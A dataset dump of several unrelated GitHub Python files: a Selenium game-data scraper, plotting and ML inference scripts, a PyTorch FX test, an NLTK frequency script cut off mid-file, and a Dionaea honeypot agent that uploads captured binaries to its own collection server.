'page0.t2.txt=\"'+str(c)+'\"'+eof\n\n\tcon.write(alt1)\n\tcon.write(alt2)\n\tcon.write(alt3)\n\t\n\t#undimCmd = \"dim=30\"\n\t#con.write(undimCmd + eof) #set screen brightness to 30%\n\n\ttime.sleep(60)\n", "repo_name": "hwebSK/Nextion-display-Raspberry-Pi-python", "sub_path": "read_influxdb_data_to_nextion.py", "file_name": "read_influxdb_data_to_nextion.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "influxdb.InfluxDBClient", "line_number": 18, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 43, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 49, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "71276812006", "text": "from webdriver_manager.chrome import ChromeDriverManager\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom time import *\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# launch browser\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--start-maximized\")\noptions.add_argument('--log-level=3')\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=options)\n# driver.get(\"https://www.leagueofgraphs.com\")\ndriver.get(\"https://www.leagueofgraphs.com/tft/champions\")\ndriver.implicitly_wait(5)\n\n# interact browser\ndef getOneChampMain(champ):\n search = driver.find_element('xpath', \"/html/body/div[2]/div[3]/div[2]/div[1]/div/form/input\")\n search.send_keys(str(champ))\n search.send_keys(Keys.RETURN)\n button = driver.find_element('xpath', \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div/div[2]/div[5]/table/tbody/tr[12]/td/a/button\")\n button.click()\n try:\n table = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div[1]/div/div/table\"))\n )\n except:\n driver.quit()\n names = table.find_elements(By.CLASS_NAME, 'name')\n res = []\n i = 1\n for name in names:\n res.append(f'Top {i}: {name.text}')\n i += 1\n return res\n\ndef delayedElement(by, path):\n try:\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((by, path))\n )\n except:\n driver.quit()\n return element\n\ndef getChampInfo():\n # ability_image = driver.find_element(By.XPATH, \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div/div[1]/div[2]/div[1]\").find_element(By.TAG_NAME, \"img\").get_attribute(\"src\") \n ability_desc = driver.find_element(By.CLASS_NAME, \"abilityDescription\").text\n tier = driver.find_element(By.CLASS_NAME, \"solo-number\").text\n champ_class = driver.find_element(By.CLASS_NAME, \"bannerSubtitle\").text\n # champ_image = driver.find_element(By.XPATH, \"/html/body/div[2]/div[3]/div[1]/div/div[1]/div/img\").get_attribute('src')\n champ = driver.find_element(By.CLASS_NAME, \"pageBanner\").find_element(By.TAG_NAME, 'h2').text\n return {\n 'name': champ,\n 'class': champ_class,\n 'tier': tier,\n 'description': ability_desc\n }\n\ntable = driver.find_element(By.XPATH, \"/html/body/div[2]/div[3]/div[3]/div[2]/div[2]/div/div/div/table\")\nchamps = table.find_elements(By.CLASS_NAME, 'name')\nchamp_data = []\nfor champ in champs:\n champ.click()\n champ_data.append(getChampInfo())\n driver.back()\n\nwith open(\"tftdata.txt\", \"w\") as file:\n file.write(str(champ_data))\n file.close()\n\nwhile(True):\n pass", "repo_name": "duc-minh-droid/selenium-tut", "sub_path": "tft-data/tftcrawling.py", "file_name": "tftcrawling.py", "file_ext": "py", "file_size_in_byte": 3073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 15, "usage_type": "call"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 29, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 43, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 44, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 44, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 54, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 54, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 56, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 56, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 56, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 64, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 64, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 65, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "13563137223", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ndata_kl =np.loadtxt(\"sigmas_kl.txt\" ,unpack=True)\ndata_tm =np.loadtxt(\"sigmas_tm.txt\" ,unpack=True)\ndata_klsn=np.loadtxt(\"sigmas_klsn.txt\",unpack=True)\nplt.plot(data_kl[0],data_kl[1]/data_kl[1,-1]-1,'ro-',lw=2,label='${\\\\rm K-L\\\\,\\\\,decomp.\\\\,\\\\,for\\\\,\\\\,}f_{\\\\rm NL}$',markeredgewidth=0)\nplt.plot(data_tm[0],data_tm[1]/data_tm[1,-1]-1,'bo-',lw=2,label='${\\\\rm Tomography}$',markeredgewidth=0)\nplt.plot(data_klsn[0],data_klsn[1]/data_klsn[1,-1]-1,'o-',color='#AAAAAA',lw=2,label='${\\\\rm K-L\\\\,\\\\,decomp.\\\\,\\\\,for\\\\,\\\\,}S/N$',markeredgewidth=0)\nplt.legend(loc='lower left',frameon=False,fontsize=18)\nplt.xlabel('${\\\\rm Number\\\\,\\\\,of\\\\,\\\\,modes}$',fontsize=18)\nplt.ylabel('$\\\\Delta\\\\sigma(f_{\\\\rm NL})/\\\\sigma_{\\\\rm best}(f_{\\\\rm NL})$',fontsize=18)\nplt.xlim([0.9,14.1])\nplt.ylim([2E-3,10])\nplt.yscale('log')\nplt.savefig(\"../Draft/Figs/kl_fnl.pdf\",bbox_inches='tight')\nplt.show()\n", "repo_name": "damonge/PH_KL", "sub_path": "LSSTred/plot_fnl.py", "file_name": "plot_fnl.py", "file_ext": "py", "file_size_in_byte": 935, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.loadtxt", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "20983881594", "text": "import watchdog.events \nimport watchdog.observers \nimport time\nimport requests\nimport json\nimport base64\nimport hashlib\nimport time\nfrom datetime import datetime\nfrom configparser import ConfigParser\nimport os\nfrom pathlib import Path\n\nDIRS_TO_MONITOR = [\nr\"/opt/dionaea/var/lib/dionaea/binaries\", \nr\"/opt/dionaea/var/lib/dionaea/ftp/root\",\nr\"/opt/dionaea/var/lib/dionaea/http/root\",\nr\"/opt/dionaea/var/lib/dionaea/tftp/root\",\nr\"/opt/dionaea/var/lib/dionaea/sip/rtp\",\nr\"/opt/dionaea/var/lib/dionaea/upnp/root\"\n]\n\nHONEY_AGENT_CONFIG_PATH\t= r\"/opt/honeyagent/honeyagent.conf\"\n\nconfig = ConfigParser()\nconfig.read(HONEY_AGENT_CONFIG_PATH)\nTOKEN = config['HONEYNODE']['TOKEN']\nWEB_SERVER_IP = config['WEB-SERVER']['SERVER_IP']\nWEB_SERVER_PORT = config['WEB-SERVER']['PORT']\nAPI_ENDPOINT_URL = \"http://{0}:{1}/api/v1/dionaea-binary-upload\".format(WEB_SERVER_IP, WEB_SERVER_PORT)\n\n\ndef md5(fname):\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n \n \nclass Handler(watchdog.events.PatternMatchingEventHandler): \n def __init__(self, pattern): \n # Set the patterns for PatternMatchingEventHandler\n self.pattern = pattern\n watchdog.events.PatternMatchingEventHandler.__init__(self, patterns=self.pattern, \n ignore_directories=True, case_sensitive=False) \n \n def on_created(self, event):\n if not \"httpupload\" in event.src_path and not \".tmp\" in event.src_path:\n print(\"Watchdog received created event - % s\" % event.src_path)\n\n time.sleep(3) # preventing the script from reading the malware file before the malware file is fully uploaded\n\n with open(event.src_path, 'rb') as malware_file:\n malware_file_base64 = base64.b64encode(malware_file.read())\n \n print(malware_file_base64)\n malware_file_base64_string = malware_file_base64.decode('utf-8')\n\n data = {\n 'file': malware_file_base64_string, \n 'token': TOKEN, \n 'time': datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), \n 'md5': md5(event.src_path)\n }\n\n try:\n headers = {'content-type': 'application/json'}\n r = requests.post(API_ENDPOINT_URL, data=json.dumps(data), headers=headers)\n print(r.text)\n\n finally:\n malware_file.close()\n parent_path = str(Path(event.src_path).parent)\n file_list = [f for f in os.listdir(parent_path)]\n for f in file_list:\n os.remove(os.path.join(parent_path, f))\n \n \nif __name__ == \"__main__\": \n try: \n event_handler = Handler(['*'])\n observer = watchdog.observers.Observer()\n for DIR in DIRS_TO_MONITOR: \n observer.schedule(event_handler, path=DIR, recursive=True) \n observer.start() \n except KeyboardInterrupt: \n observer.stop() \n observer.join() \n", "repo_name": "zql2532666/HoneyIDS", "sub_path": "app/deployment_scripts/dionaea_binary_uploader.py", "file_name": "dionaea_binary_uploader.py", "file_ext": "py", "file_size_in_byte": 3128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "configparser.ConfigParser", "line_number": 25, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 34, "usage_type": "call"}, {"api_name": "watchdog.events.events", "line_number": 41, "usage_type": "attribute"}, {"api_name": "watchdog.events", "line_number": 41, "usage_type": "name"}, {"api_name": "watchdog.events.events.PatternMatchingEventHandler.__init__", "line_number": 45, "usage_type": "call"}, {"api_name": "watchdog.events.events", "line_number": 45, "usage_type": "attribute"}, {"api_name": "watchdog.events", "line_number": 45, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 69, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 69, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 74, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 75, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "watchdog.events.observers.Observer", "line_number": 83, "usage_type": "call"}, {"api_name": "watchdog.events.observers", "line_number": 83, "usage_type": "attribute"}, {"api_name": "watchdog.events", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "5722605070", "text": "\"Precess input folder\"\nimport os\nimport time\nfrom pathlib import Path\nfrom shutil import rmtree, copytree\nfrom PIL import Image\nimport numpy as np\nimport cv2\n\nfrom inference.config import H_MODEL_FILE, L_MODEL_FILE, _DEBUG\nfrom inference.utils import make_grayscale, resize\nfrom inference.masking import mask\nfrom inference.depth import nn_depth\nfrom inference.pointcloud import nngenerate_pointcloud\n\n#from filter.masks import addmask_to_picture\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1' # more logging\n# disable cuda\n#os.environ['CUDA_VISIBLE_DEVICES'] = \"-1\"\nimport tensorflow as tf\n#_DEBUG=True\n_PERF = True\n_FILTER = True\n\nTF_VERBOSE=1 # progress bar\nTF_VERBOSE=0 # silent\nTF_VERBOSE=2 # 1 line\n\nPI = 2*np.pi\n\n# load model 1 time for all\nL_model = tf.keras.models.load_model(L_MODEL_FILE)\nH_model = tf.keras.models.load_model(H_MODEL_FILE)\n\n# def load_models():\n# global L_model, H_model\n# L_model = tf.keras.models.load_model(L_MODEL_FILE)\n# H_model = tf.keras.models.load_model(H_MODEL_FILE)\n\ndef db_kinfer(x):\n \"run L-model\"\n predicted_img = L_model.predict(np.array([np.expand_dims(x, -1)]),verbose=TF_VERBOSE)\n predicted_img = np.argmax(predicted_img, axis=-1)\n predicted_img = predicted_img.squeeze()\n return predicted_img\n\ndef process(folder, outfolder=None):\n \"Procss the folder with hole inference\"\n if not folder.exists():\n raise Exception('Input folder dont exist')\n if outfolder is None:\n outfolder = folder\n if _DEBUG:\n print(\"Starting processing\", folder, outfolder)\n #load_models()\n image0 = folder / 'image0.png'\n img = cv2.imread(str(image0)).astype(np.float32)\n #img = resize(img, 160, 160)\n img = make_grayscale(img)\n if _DEBUG:\n cv2.imwrite(str(outfolder / 'gray.png'), img)\n inp_img = img/255\n mymask = mask(folder, outfolder)\n inp_img = np.multiply(np.logical_not(mymask), inp_img)\n wrap_input = H_model.predict(np.array([np.expand_dims(inp_img, -1)]),verbose=TF_VERBOSE)\n wrap_input = wrap_input.squeeze()\n wrap_input = np.multiply(np.logical_not(mymask), wrap_input)\n if _DEBUG:\n cv2.imwrite(str(outfolder / 'wrapin.png'), 255*wrap_input)\n #print(inpfile)\n # mymask = mask(inFolder + '/render'+str(i)+'/')\n # inp_img = np.multiply(np.logical_not(mymask), inp_img)\n k_img = db_kinfer(wrap_input)\n unwrapdata = np.add(2*PI*wrap_input, np.multiply(2*PI,k_img) )\n if _DEBUG:\n cv2.imwrite(str(outfolder / 'unwrap.png'), unwrapdata)\n cv2.imwrite(str(outfolder / 'k.png'), k_img)\n nndepth =nn_depth(depthoutfolder=outfolder, unwrap= .50* unwrapdata,basecount= 50)\n nngenerate_pointcloud(folder / 'image8.png', outfolder / 'mask.png', nndepth, outfolder / 'pointcloud.ply')\n\n########### testing ############\n\ndef process_testimage():\n \"process i image folder\"\n testfolder = Path(__file__).parent.parent / 'testdata/testtarget/render0'\n tmp_folder = Path(__file__).parent.parent / 'tmp'\n rmtree(tmp_folder, ignore_errors=True)\n copytree(testfolder, tmp_folder)\n myoutfolder = tmp_folder / 'out'\n myoutfolder.mkdir()\n if _PERF:\n proc_st = time.process_time()\n st_time = time.time()\n process(tmp_folder, myoutfolder)\n if _PERF:\n end_time = time.time()\n proc_end = time.process_time()\n print(\"CPU exec time:\", proc_end-proc_st, \"seconds\")\n print(\"Elapsed time:\", end_time-st_time, \"seconds\")\n print(\"Data processed\")\n\ndef process_image_set(folder):\n \"process a image folder set\"\n tmp_folder = Path(__file__).parent.parent / 'tmp'\n rmtree(tmp_folder, ignore_errors=True)\n tmp_folder.mkdir()\n folders = sorted(folder.glob('*'))\n if _PERF:\n proc_st = time.process_time()\n st_time = time.time()\n for f in folders:\n if f.is_dir():\n print(f)\n copytree(f, tmp_folder / f.name)\n if _FILTER:\n fil=tmp_folder / f.name / 'image0.png'\n img = Image.open(fil)\n img = addmask_to_picture(img)\n img.save(fil)\n for fil in ['image8.png','image9.png']:\n img = Image.open(tmp_folder / f.name / fil)\n img=addmask_to_picture(img, maskval=0)\n img.save(tmp_folder / f.name / fil)\n # myoutfolder = tmp_folder / 'out'\n # myoutfolder.mkdir()\n process(tmp_folder / f.name)\n if _PERF:\n end_time = time.time()\n proc_end = time.process_time()\n print(\"CPU exec time:\", proc_end-proc_st, \"seconds\")\n print(\"Elapsed time:\", end_time-st_time, \"seconds\")\n print(\"Data processed\")\n\nif __name__=='__main__':\n #process_testimage()\n testset_folder = Path(__file__).parent.parent / 'testdata/testtarget'\n testset_folder = Path(__file__).parent.parent / 'testdata/1cm_target_220830'\n testset_folder = Path(__file__).parent.parent / 'testdata/test'\n process_image_set(testset_folder)\n", "repo_name": "peterlholm/inference", "sub_path": "inference/process_input.py", "file_name": "process_input.py", "file_ext": "py", "file_size_in_byte": 5023, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 34, "usage_type": "call"}, {"api_name": "inference.config.L_MODEL_FILE", "line_number": 34, "usage_type": "argument"}, {"api_name": "tensorflow.keras", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 35, "usage_type": "call"}, {"api_name": "inference.config.H_MODEL_FILE", "line_number": 35, "usage_type": "argument"}, {"api_name": "tensorflow.keras", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 45, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 55, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "inference.utils.make_grayscale", "line_number": 61, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 62, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 63, "usage_type": "call"}, {"api_name": "inference.masking.mask", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 69, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 70, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 76, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 77, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 79, "usage_type": "call"}, {"api_name": "inference.depth.nn_depth", "line_number": 80, "usage_type": "call"}, {"api_name": "inference.pointcloud.nngenerate_pointcloud", "line_number": 81, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 87, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 88, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 89, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 90, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 94, "usage_type": "call"}, {"api_name": "time.time", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 99, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 106, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 107, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 111, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 116, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 119, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 119, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 123, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 123, "usage_type": "name"}, {"api_name": "time.time", "line_number": 130, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 131, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 139, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "74532279524", "text": "import torch\nimport torch.nn as nn\nimport torch.fx.experimental.optimization as optimization\n\nclass SimpleNet(torch.nn.Module):\n def __init__(self):\n super(SimpleNet, self).__init__()\n self.conv1 = torch.nn.Conv2d(64, 64, (3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = nn.Sequential(torch.nn.Conv2d(64, 64, (3, 3), stride=(2, 2), padding=(1, 1), bias=False),\n torch.nn.Conv2d(64, 64, (3, 3), stride=(2, 2), padding=(1, 1), bias=False))\n\n def forward(self, x):\n y = self.relu(self.conv1(x))\n y = self.layer1(y)\n #print(\"y.size: {}\".format(y.size), flush=True)\n return y\n\nclass LayerAffinityModule(torch.nn.Module):\n def __init__(self, original_module):\n super(LayerAffinityModule, self).__init__()\n self.original_module = original_module\n print(\"---------------finish create LayerAffinityModule--------\", flush=True)\n print(\"---------------self.original_module.size()--------\", flush=True)\n self.children_modules = []\n for name, m in self.original_module.named_children():\n print(name, '->', m, flush=True)\n self.children_modules.append(m)\n # for m in self.original_module.children():\n # self.children_modules.append(m)\n\n def forward(self, *args, **kwargs):\n # print(self.children_modules.__len__())\n # for m in self.children_modules:\n # print(type(m), flush=True)\n # return self.original_module(*args, **kwargs)\n for idx in range(self.children_modules.__len__()):\n print(\"self.children_modules[{0}]: is:{1}\".format(idx, self.children_modules[idx]))\n if idx == 0:\n res = self.children_modules[0](*args, **kwargs)\n elif idx == 9:\n res = torch.flatten(res, 1)\n res = self.children_modules[idx](res)\n else:\n if type(res) is tuple:\n res = self.children_modules[idx](*res)\n else:\n res = self.children_modules[idx](res)\n print(\"------type(res) is:{}\".format(type(res)))\n print(\"------res.size() is:{}\".format(res.size()))\n return res\n\nif __name__ == \"__main__\":\n model = SimpleNet().eval()\n x = torch.rand(64, 64, 3, 3)\n\n print(\"----model1----------\")\n model(x)\n\n print(\"----model2----------\")\n model2 = LayerAffinityModule(model)\n model2(x)\n\n print(\"----FX_GRAPHModule----------\")\n FX_GRAPHModule = optimization.fuse(model)\n FX_GRAPHModule(x)\n\n print(\"----FX_GRAPHModule Affinity----------\")\n model4 = LayerAffinityModule(FX_GRAPHModule)\n model4(x)\n\n print(\"----------finish test-------------\", flush=True)", "repo_name": "leslie-fang-intel/torch_script", "sub_path": "fx_mixed_affinity/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.flatten", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.fx.experimental.optimization.fuse", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.fx.experimental.optimization", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "15051414781", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport nltk\nfrom nltk.corpus import PlaintextCorpusReader\nfrom nltk . corpus import stopwords\nfrom nltk import FreqDist\nfrom nltk.collocations import *\nfrom nltk . stem import WordNetLemmatizer\nimport xlwt\n\n\n# In[2]:\n\n\n#open file_1\ncorpus_root = '/Users/lc/Desktop/CIS 668/HW/hw1'\nwordlists = PlaintextCorpusReader(corpus_root,'.*')\n\n\n# In[3]:\n\n\n#tokenizing\nwordlist1 = wordlists.words(fileids = 'state_union_part1.txt')\n\n\n# In[4]:\n\n\n#remove len(words) < 2\nwordlist1 = [ w for w in wordlist1 if len(w) > 2]\n\n\n# In[5]:\n\n\n#translate into low case format\nwordlist1 = [ w.lower() for w in wordlist1 if w.isalpha()]\n\n\n# In[6]:\n\n\n#removing meaningless stop words\nstopwordSet = set(stopwords.words('english'))\nwordlist1 = [ w for w in wordlist1 if w not in stopwordSet]\n\n\n# In[7]:\n\n\n#lemmatizatio\nwordlist1 = [ WordNetLemmatizer ().lemmatize(w) for w in wordlist1]\n\n\n# In[8]:\n\n\nfreWords1 = FreqDist(wordlist1)\nwordlist1_freq = freWords1.most_common(50)\n# wordlist1_freq\n\n\n# In[9]:\n\n\nbigram_measures = nltk.collocations.BigramAssocMeasures()\nfinder1 = BigramCollocationFinder.from_words(wordlist1)\nbigram1_freq = finder1.score_ngrams(bigram_measures.raw_freq)\nbigram1_freq = bigram1_freq[:50]\n\n\n# In[10]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[11]:\n\n\nwordlist2 = wordlists.words(fileids = 'state_union_part2.txt')\nwordlist2 = [ w.lower() for w in wordlist2 if w.isalpha()]\nwordlist2 = [ w for w in wordlist2 if len(w) > 2]\nwordlist2 = [ w for w in wordlist2 if w not in stopwordSet]\nwordlist2 = [ WordNetLemmatizer ().lemmatize(w) for w in wordlist2]\n\n\n# In[12]:\n\n\nfreWords = FreqDist(wordlist2)\nwordlist2_freq = freWords.most_common(50)\n# wordlist2_freq\n\n\n# In[42]:\n\n\nfinder2 = 